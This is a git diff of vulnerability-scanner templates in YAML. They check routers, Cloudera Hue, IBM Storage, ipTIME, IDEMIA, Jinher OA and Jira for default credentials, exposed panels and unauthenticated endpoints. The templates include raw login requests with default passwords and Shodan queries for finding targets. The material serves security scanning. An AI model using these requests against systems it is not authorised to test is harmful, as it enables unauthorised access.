+ words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/auth/huawei-HG532e-default-router-login.yaml b/poc/auth/huawei-HG532e-default-router-login.yaml deleted file mode 100644 index 2ebc7ab348..0000000000 --- a/poc/auth/huawei-HG532e-default-router-login.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: huawei-HG532e-default-login -info: - name: Huawei HG532e Default Credential - description: Huawei HG532e default admin credentials were discovered. - author: pussycat0x - severity: high - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 -requests: - - raw: - - | - POST /index/login.cgi HTTP/1.1 - Host: {{Hostname}} - Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0 - Content-Type: application/x-www-form-urlencoded - - Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Set-Cookie: SessionID' - - type: word - part: body - words: - - "replace" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/huawei-hg532e-default-router-login-8063.yaml b/poc/auth/huawei-hg532e-default-router-login-8063.yaml index e29e927d84..2ebc7ab348 100644 --- a/poc/auth/huawei-hg532e-default-router-login-8063.yaml +++ b/poc/auth/huawei-hg532e-default-router-login-8063.yaml @@ -1,16 +1,17 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential + description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high - description: Huawei HG532e default admin credentials were discovered. + metadata: + shodan-query: http.html:"HG532e" + tags: default-login,huawei classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.html:"HG532e" - tags: default-login,huawei requests: - raw: - | diff --git a/poc/auth/huawei-router-auth-bypass-8073.yaml b/poc/auth/huawei-router-auth-bypass-8073.yaml index 4ad8b9d364..ec8c041750 100644 --- a/poc/auth/huawei-router-auth-bypass-8073.yaml +++ b/poc/auth/huawei-router-auth-bypass-8073.yaml @@ -1,27 +1,39 @@ id: huawei-router-auth-bypass + info: - name: Huawei Router Authentication Bypass + name: Huawei Router - Authentication Bypass author: gy741 severity: critical - description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. + description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device. reference: - https://www.exploit-db.com/exploits/48310 - tags: huawei,auth-bypass,router -requests: + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 1 + tags: auth-bypass,router,edb,huawei + +http: - raw: - | GET /api/system/deviceinfo HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Referer: {{BaseURL}} + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "DeviceName" - "SerialNumber" - "HardwareVersion" condition: and + +# digest: 4a0a00473045022100dad2e64cfe1e58f0bad69d1da6ede13447ad1a58f60e8dcb50a1946e8980e63f02203a2282329ce371bf8d213ace5f75e364d5d78dc0dd505b85474bbee7babe5447:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/huawei-router-auth-bypass-8076.yaml b/poc/auth/huawei-router-auth-bypass-8076.yaml new file mode 100644 index 0000000000..bde5f950f6 --- /dev/null +++ b/poc/auth/huawei-router-auth-bypass-8076.yaml @@ -0,0 +1,37 @@ +id: huawei-router-auth-bypass + +info: + name: Huawei Router - Authentication Bypass + author: gy741 + severity: critical + description: Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device. + reference: + - https://www.exploit-db.com/exploits/48310 + classification: + cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-288 + tags: huawei,auth-bypass,router + +requests: + - raw: + - | + GET /api/system/deviceinfo HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "DeviceName" + - "SerialNumber" + - "HardwareVersion" + condition: and + +# Enhanced by mp on 2022/06/03 diff --git a/poc/auth/hue-default-credential-8080.yaml b/poc/auth/hue-default-credential-8080.yaml index 44b2307cb8..71dcb8de6a 100644 --- a/poc/auth/hue-default-credential-8080.yaml +++ b/poc/auth/hue-default-credential-8080.yaml @@ -1,33 +1,29 @@ id: hue-default-credential - info: name: Cloudera Hue Default Admin Login author: For3stCo1d severity: high description: Cloudera Hue default admin credentials were discovered. - reference: https://github.com/cloudera/hue - metadata: - shodan-query: title:"Hue - Welcome to Hue" + reference: + - https://github.com/cloudera/hue classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + shodan-query: title:"Hue - Welcome to Hue" tags: hue,default-login,oss,cloudera - requests: - raw: - | GET /hue/accounts/login?next=/ HTTP/1.1 Host: {{Hostname}} - - | POST /hue/accounts/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork payloads: user: @@ -35,13 +31,11 @@ requests: - hue - hadoop - cloudera - pass: - admin - hue - hadoop - cloudera - cookie-reuse: true extractors: - type: regex @@ -51,7 +45,6 @@ requests: group: 1 regex: - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true stop-at-first-match: true matchers-condition: and @@ -62,7 +55,6 @@ requests: - contains(tolower(all_headers_2), 'csrftoken=') - contains(tolower(all_headers_2), 'sessionid=') condition: and - - type: status status: - 302 diff --git a/poc/auth/hue-default-credential-8081.yaml b/poc/auth/hue-default-credential-8081.yaml deleted file mode 100644 index 71dcb8de6a..0000000000 --- a/poc/auth/hue-default-credential-8081.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: hue-default-credential -info: - name: Cloudera Hue Default Admin Login - author: For3stCo1d - severity: high - description: Cloudera Hue default admin credentials were discovered. - reference: - - https://github.com/cloudera/hue - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: title:"Hue - Welcome to Hue" - tags: hue,default-login,oss,cloudera -requests: - - raw: - - | - GET /hue/accounts/login?next=/ HTTP/1.1 - Host: {{Hostname}} - - | - POST /hue/accounts/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork - payloads: - user: - - admin - - hue - - hadoop - - cloudera - pass: - - admin - - hue - - hadoop - - cloudera - cookie-reuse: true - extractors: - - type: regex - name: csrfmiddlewaretoken - part: body - internal: true - group: 1 - regex: - - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(all_headers_2), 'csrftoken=') - - contains(tolower(all_headers_2), 'sessionid=') - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/auth/hue-default-credential.yaml b/poc/auth/hue-default-credential.yaml deleted file mode 100644 index f401f97a57..0000000000 --- a/poc/auth/hue-default-credential.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: hue-default-credential -info: - name: Cloudera Hue Default Admin Login - author: For3stCo1d - severity: high - description: Cloudera Hue default admin credentials were discovered. - reference: https://github.com/cloudera/hue - metadata: - shodan-query: title:"Hue - Welcome to Hue" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - tags: hue,default-login,oss,cloudera -requests: - - raw: - - | - GET /hue/accounts/login?next=/ HTTP/1.1 - Host: {{Hostname}} - - | - POST /hue/accounts/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F - attack: pitchfork - payloads: - user: - - admin - - hue - - hadoop - - cloudera - pass: - - admin - - hue - - hadoop - - cloudera - cookie-reuse: true - extractors: - - type: regex - name: csrfmiddlewaretoken - part: body - internal: true - group: 1 - regex: - - name='csrfmiddlewaretoken' value='(.+?)' - req-condition: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(body_1), 'welcome to hue') - - contains(tolower(all_headers_2), 'csrftoken=') - - contains(tolower(all_headers_2), 'sessionid=') - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/auth/ibm-note-login-8110.yaml b/poc/auth/ibm-note-login-8112.yaml similarity index 100% rename from poc/auth/ibm-note-login-8110.yaml rename to poc/auth/ibm-note-login-8112.yaml diff --git a/poc/auth/ibm-storage-default-credential-8124.yaml b/poc/auth/ibm-storage-default-credential-8124.yaml index e018689a5d..2f4d8ef2f0 100644 --- a/poc/auth/ibm-storage-default-credential-8124.yaml +++ b/poc/auth/ibm-storage-default-credential-8124.yaml @@ -1,4 +1,5 @@ id: ibm-storage-default-login + info: name: IBM Storage Management Default Login author: madrobot @@ -10,8 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: default-login,ibm,storage -requests: + +http: - raw: - | POST /0/Authenticate HTTP/1.1 @@ -20,12 +24,14 @@ requests: Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}}&continue=&submit=submit+form + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word @@ -34,12 +40,14 @@ requests: - "Property of IBM" condition: and part: body + - type: word words: - "JSESSIONID" part: header + - type: status status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a00473045022045caeb1423a85f3a5e1837c387a54cdba7ce85d5e7a15004f5a659ad8c5c60b5022100bdf5c8143053d33d9ee77931d4a8ad38dcbea0a50109515007e995a42f599a0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ibm-storage-default-credential-8125.yaml b/poc/auth/ibm-storage-default-credential-8125.yaml index 2f4d8ef2f0..6717c8c319 100644 --- a/poc/auth/ibm-storage-default-credential-8125.yaml +++ b/poc/auth/ibm-storage-default-credential-8125.yaml @@ -1,21 +1,10 @@ id: ibm-storage-default-login - info: name: IBM Storage Management Default Login author: madrobot - severity: high - description: IBM Storage Management default admin login credentials were discovered. - reference: - - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 + severity: medium tags: default-login,ibm,storage - -http: +requests: - raw: - | POST /0/Authenticate HTTP/1.1 @@ -24,14 +13,12 @@ http: Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}}&continue=&submit=submit+form - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word @@ -40,14 +27,10 @@ http: - "Property of IBM" condition: and part: body - - type: word words: - "JSESSIONID" part: header - - type: status status: - 200 - -# digest: 4a0a00473045022045caeb1423a85f3a5e1837c387a54cdba7ce85d5e7a15004f5a659ad8c5c60b5022100bdf5c8143053d33d9ee77931d4a8ad38dcbea0a50109515007e995a42f599a0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/icinga-web-login-8134.yaml b/poc/auth/icinga-web-login-8134.yaml new file mode 100644 index 0000000000..0ef7258a86 --- /dev/null +++ b/poc/auth/icinga-web-login-8134.yaml @@ -0,0 +1,22 @@ +id: icinga-web-login + +info: + name: Icinga Web 2 Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + tags: panel,icinga + +requests: + - method: GET + path: + - '{{BaseURL}}/authentication/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Icinga Web 2 Login" + - type: status + status: + - 200 diff --git a/poc/auth/icinga-web-login-8137.yaml b/poc/auth/icinga-web-login-8137.yaml deleted file mode 100644 index 5602ac406b..0000000000 --- a/poc/auth/icinga-web-login-8137.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: icinga-web-login - -info: - name: Icinga Web 2 Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"Icinga Web 2 Login" - tags: panel,icinga - -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login' - - matchers-condition: and - matchers: - - type: word - words: - - "Icinga Web 2 Login" - - type: status - status: - - 200 diff --git a/poc/auth/icinga-web-login.yaml b/poc/auth/icinga-web-login.yaml index 4c7f3d265e..5602ac406b 100644 --- a/poc/auth/icinga-web-login.yaml +++ b/poc/auth/icinga-web-login.yaml @@ -1,20 +1,14 @@ id: icinga-web-login info: - name: Icinga Web 2 Login Panel - Detect + name: Icinga Web 2 Login author: dhiyaneshDK severity: info - description: Icinga Web 2 login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Icinga Web 2 Login" tags: panel,icinga -http: +requests: - method: GET path: - '{{BaseURL}}/authentication/login' @@ -24,9 +18,6 @@ http: - type: word words: - "Icinga Web 2 Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100b93f1bc0afb3895ba775c85a240d2acb0a39e22f725c0e7d8e75ec71bf39e1aa022068d32d69ef34775c7343e9e5d1c9682834d4961df25a63fd9fb9019eb57eb7fe:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/idemia-biometrics-default-login-8138.yaml b/poc/auth/idemia-biometrics-default-login-8138.yaml index 819cd0e0c3..1a7ffa1347 100644 --- a/poc/auth/idemia-biometrics-default-login-8138.yaml +++ b/poc/auth/idemia-biometrics-default-login-8138.yaml @@ -1,18 +1,11 @@ id: idemia-biometrics-default-login - info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: medium - description: IDEMIA BIOMetrics application default login credentials were discovered. + severity: high + description: Default Login of password=12345 on IDEMIA BIOMetrics application. reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -20,11 +13,9 @@ requests: Host: {{Hostname}} password={{password}} - payloads: password: - "12345" - matchers-condition: and matchers: - type: word @@ -32,15 +23,11 @@ requests: words: - "session_id=" - "resource" - - type: word part: body negative: true words: - "Invalid Password" - - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/idemia-biometrics-default-login-8139.yaml b/poc/auth/idemia-biometrics-default-login-8139.yaml deleted file mode 100644 index 1a7ffa1347..0000000000 --- a/poc/auth/idemia-biometrics-default-login-8139.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: idemia-biometrics-default-login -info: - name: IDEMIA BIOMetrics Default Login - author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. - reference: https://www.google.com/search?q=idemia+password%3D+"12345" - tags: idemia,biometrics,default-login -requests: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - - password={{password}} - payloads: - password: - - "12345" - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "session_id=" - - "resource" - - type: word - part: body - negative: true - words: - - "Invalid Password" - - type: status - status: - - 200 diff --git a/poc/auth/idemia-biometrics-default-login.yaml b/poc/auth/idemia-biometrics-default-login-8141.yaml similarity index 100% rename from poc/auth/idemia-biometrics-default-login.yaml rename to poc/auth/idemia-biometrics-default-login-8141.yaml diff --git a/poc/auth/iptime-default-login-8193.yaml b/poc/auth/iptime-default-login-8193.yaml deleted file mode 100644 index 0cfc4b4f3d..0000000000 --- a/poc/auth/iptime-default-login-8193.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: iptime-default-login - -info: - name: ipTIME Default Login - author: gy741 - severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: iptime,default-login - -http: - - raw: - - | - POST /sess-bin/login_handler.cgi HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/sess-bin/login_session.cgi - - username={{username}}&passwd={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "setCookie" - - "efm_session_id" - - "login.cgi" - part: body - condition: and - -# digest: 480a00453043021f48378eaeeba6c7b9c45cbe0a34e4f50162ecf7871700bb62a1183045ce49b402205d975fa7eabd5ad242a0eee4b7894233564acfe9e9b04ee5775e4d4ae57142e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/iptime-default-login-8194.yaml b/poc/auth/iptime-default-login-8194.yaml index a03c2cf675..024b8d62ab 100644 --- a/poc/auth/iptime-default-login-8194.yaml +++ b/poc/auth/iptime-default-login-8194.yaml @@ -3,13 +3,6 @@ info: name: ipTIME Default Login author: gy741 severity: high - description: ipTIME default admin credentials were discovered. - reference: - - https://www.freewebtools.com/IPTIME/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: iptime,default-login requests: - raw: @@ -37,5 +30,3 @@ requests: - "login.cgi" part: body condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/jellyseerr-login-panel.yaml b/poc/auth/jellyseerr-login-panel.yaml deleted file mode 100644 index 5bdb7987a0..0000000000 --- a/poc/auth/jellyseerr-login-panel.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: jellyseerr-login-panel - -info: - name: Jellyseerr Login Panel - Detect - author: ritikchaddha - severity: info - reference: - - https://github.com/Fallenbagel/jellyseerr - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:-2017604252 - tags: panel,jellyseerr,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/login" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Jellyseerr' - - 'content="Jellyseerr' - - 'applicationTitle":"Jellyseerr' - condition: or - - - type: status - status: - - 200 - -# digest: 490a004630440220216b9084def55b769cd30979959e20c1936b1bbfb21ba7f627c5f5f4ae3577cc022055317170baef7304b3c65636e266d0ce1fcf6b4c68d3de4a90caf0756bb717d0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jenkins-login-8277.yaml b/poc/auth/jenkins-login-8277.yaml deleted file mode 100644 index 4a36d85302..0000000000 --- a/poc/auth/jenkins-login-8277.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: jenkins-login -info: - name: Jenkins Login Detected - description: Jenkins is an open source automation server. - author: pdteam - severity: info - tags: panel,jenkins - remediation: Ensure proper access. - reference: https://www.jenkins.io/doc/book/security/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in [Jenkins]' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/10 diff --git a/poc/auth/jenkins-login-8280.yaml b/poc/auth/jenkins-login-8280.yaml new file mode 100644 index 0000000000..60dbd99b0c --- /dev/null +++ b/poc/auth/jenkins-login-8280.yaml @@ -0,0 +1,18 @@ +id: jenkins-login +info: + name: Jenkins Login + author: pdteam + severity: info + tags: panel,jenkins +requests: + - method: GET + path: + - '{{BaseURL}}/login' + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in [Jenkins]' + - type: status + status: + - 200 diff --git a/poc/auth/jfrog-unauth-build-exposed-8299.yaml b/poc/auth/jfrog-unauth-build-exposed-8299.yaml new file mode 100644 index 0000000000..cdd0467066 --- /dev/null +++ b/poc/auth/jfrog-unauth-build-exposed-8299.yaml @@ -0,0 +1,30 @@ +id: jfrog-unauth-build-exposed +info: + name: JFrog Unauthentication Builds + author: dhiyaneshDK + severity: medium + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + tags: jfrog +requests: + - raw: + - | + POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} + matchers-condition: and + matchers: + - type: word + words: + - "last_build_number" + - "build_name" + condition: and + part: body + - type: word + words: + - application/json + part: header + - type: status + status: + - 200 diff --git a/poc/auth/jfrog-unauth-build-exposed-8302.yaml b/poc/auth/jfrog-unauth-build-exposed-8302.yaml index 95f977e802..63e5eb5c75 100644 --- a/poc/auth/jfrog-unauth-build-exposed-8302.yaml +++ b/poc/auth/jfrog-unauth-build-exposed-8302.yaml @@ -1,12 +1,11 @@ id: jfrog-unauth-build-exposed - info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog - requests: - raw: - | @@ -15,7 +14,6 @@ requests: Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} - matchers-condition: and matchers: - type: word @@ -24,12 +22,10 @@ requests: - "build_name" condition: and part: body - - type: word words: - application/json part: header - - type: status status: - 200 diff --git a/poc/auth/jinher-oa-default-login-8311.yaml b/poc/auth/jinher-oa-default-login-8311.yaml index 6be5f643d2..84e1e87e9b 100644 --- a/poc/auth/jinher-oa-default-login-8311.yaml +++ b/poc/auth/jinher-oa-default-login-8311.yaml @@ -1,11 +1,15 @@ id: jinher-oa-default-login info: - name: Jinher oa C6 Default Password + name: Jinher-OA C6 - Default Admin Discovery author: ritikchaddha severity: high - description: Jinher-OA C6 default administrator account credential. + description: Jinher-OA C6 default admin credentials were discovered. reference: - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: jinher,default-login requests: - raw: @@ -36,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/jinher-oa-default-login-8312.yaml b/poc/auth/jinher-oa-default-login-8312.yaml new file mode 100644 index 0000000000..91cbc784f4 --- /dev/null +++ b/poc/auth/jinher-oa-default-login-8312.yaml @@ -0,0 +1,52 @@ +id: jinher-oa-default-login + +info: + name: Jinher-OA C6 - Default Admin Discovery + author: ritikchaddha + severity: high + description: Jinher-OA C6 default admin credentials were discovered. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: jinher,default-login + +http: + - raw: + - | + POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}& + + attack: pitchfork + payloads: + username: + - admin + password: + - "000000" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ϵͳ¹ÜÀíÔ±|" + - "ÄúºÃ|||" + condition: and + + - type: word + part: header + words: + - "SessionIDAdmin=" + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c7f1aeb7fdb9213a70f5c33dbd33cb2e5f4445b1b3c8644668dfb733ae8e3f48022100ff616236d4f688db2f8267b1d09d2a573a8c6c266b7690b419697f88bdc8faf7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-login-default.yaml b/poc/auth/jira-login-default.yaml index 4b34037e6d..d3d14b37e6 100644 --- a/poc/auth/jira-login-default.yaml +++ b/poc/auth/jira-login-default.yaml @@ -8,10 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: + max-request: 1 shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -32,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -43,4 +43,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a0047304502201b101496c1854e349bf95753e7cdfb3343d8599dc26efb543e4c3ceb2bb95e1f0221008648d8f4932d84b324ff6a350ea792a0ef1ef91a393292f43082173ccbb99a54:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-dashboards-8323.yaml b/poc/auth/jira-unauthenticated-dashboards-8323.yaml index 8628c41074..f31db155cc 100644 --- a/poc/auth/jira-unauthenticated-dashboards-8323.yaml +++ b/poc/auth/jira-unauthenticated-dashboards-8323.yaml @@ -1,21 +1,15 @@ id: jira-unauthenticated-dashboards - # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - type: word words: @@ -31,4 +25,3 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-dashboards-8327.yaml b/poc/auth/jira-unauthenticated-dashboards-8327.yaml index 54b3c68a6d..8628c41074 100644 --- a/poc/auth/jira-unauthenticated-dashboards-8327.yaml +++ b/poc/auth/jira-unauthenticated-dashboards-8327.yaml @@ -1,16 +1,21 @@ id: jira-unauthenticated-dashboards -# If public sharing is ON it allows users to share dashboards and filters with all users including +# If public sharing is ON it allows users to share dashboards and filters with all users including # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: + +http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: @@ -20,15 +25,10 @@ requests: condition: and # Remediation: - # Ensure that this permission is restricted to specific groups that require it. - # You can restrict it in Administration > System > Global Permissions. - # Turning the feature off will not affect existing filters and dashboards. - # If you change this setting, you will still need to update the existing filters and dashboards if they have already been - # shared publicly. - # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml index da56b71092..bb38dd61ea 100644 --- a/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml @@ -1,17 +1,14 @@ id: jira-unauthenticated-installed-gadgets - info: name: Jira Unauthenticated Installed gadgets author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) tags: atlassian,jira - requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true max-redirects: 2 matchers-condition: and @@ -19,7 +16,6 @@ requests: - type: word words: - 'jaxbDirectoryContents' - - type: status status: - 200 diff --git a/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml new file mode 100644 index 0000000000..58e5fb36b6 --- /dev/null +++ b/poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml @@ -0,0 